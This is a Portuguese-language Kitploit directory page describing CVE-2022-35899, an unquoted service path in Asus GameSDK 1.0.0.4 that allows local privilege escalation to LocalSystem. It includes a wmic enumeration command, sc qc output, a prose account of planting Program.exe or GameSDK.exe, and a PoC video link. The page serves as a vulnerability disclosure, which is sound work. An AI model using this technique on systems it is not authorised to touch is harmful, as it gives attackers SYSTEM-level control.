Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-35899 — Caminho de Serviço Sem Aspas Asus GameSdk | Kitploit
Ferramentas/GitHubGitHub/angelopioamirante/cve-2022-35899
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoConfiguração Incorreta
GitHubangelopioamirante/cve-2022-35899

CVE-2022-35899

Caminho de Serviço Sem Aspas Asus GameSdk

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-35899

Caminho de serviço sem aspas Asus GameSdk

Título do Exploit: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Caminho de serviço sem aspas (Escalação de Privilégios)

Data: 07/14/2022

Autor do Exploit: Angelo Pio Amirante

Versão: 1.0.0.4

Testado em: Windows 10

Versão corrigida: 1.0.5.0

Passo para descobrir o caminho de serviço sem aspas:

root@kitploit:~
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Informações sobre o serviço:

root@kitploit:~
C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

Exploit

Se um atacante já tiver comprometido o sistema e o usuário atual tiver privilégios para escrever na pasta "C:\Program Files (x86)\ASUS" ou em "C:", ele poderia colocar seus próprios arquivos "Program.exe" ou "GameSDK.exe", respectivamente, e, quando o serviço iniciar, ele executaria o arquivo malicioso em vez do "GameSDK.exe" original.

Impacto

Um atacante pode elevar seus privilégios no sistema.

Vídeo POC

https://youtu.be/u_8JMIgn-5g

Baixar ferramenta